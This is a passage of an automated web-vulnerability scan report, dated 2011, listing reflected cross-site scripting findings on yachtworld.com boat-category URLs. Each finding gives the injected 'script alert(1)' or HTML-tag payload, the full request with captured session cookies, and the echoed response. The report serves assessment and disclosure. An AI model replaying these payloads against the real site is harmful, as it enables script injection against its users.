savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:38 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Bertram3c806"><a>b4bf5174a11/A-1">
...[SNIP]...

3.203. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bertram/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d91"><script>alert(1)</script>a2aac47c88d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Bertram/1e8d91"><script>alert(1)</script>a2aac47c88d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Bertram/1e8d91"><script>alert(1)</script>a2aac47c88d/A-1">
...[SNIP]...

3.204. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Boston+Whaler/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7edc"><a>9c955f6a6e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typec7edc"><a>9c955f6a6e2/Boston+Whaler/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:46 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typec7edc"><a>9c955f6a6e2/Boston+Whaler/1">
...[SNIP]...

3.205. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Boston+Whaler/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48744"><a>c838f7e4180 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Boston+Whaler48744"><a>c838f7e4180/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:56 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Boston+Whaler48744"><a>c838f7e4180/A-1">
...[SNIP]...

3.206. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Boston+Whaler/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d343b"><script>alert(1)</script>731c6420188 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Boston+Whaler/1d343b"><script>alert(1)</script>731c6420188 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:05 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Boston+Whaler/1d343b"><script>alert(1)</script>731c6420188/A-1">
...[SNIP]...

3.207. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cabo/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e15"><script>alert(1)</script>83362fb7d64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/typea6e15"><script>alert(1)</script>83362fb7d64/Cabo/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; 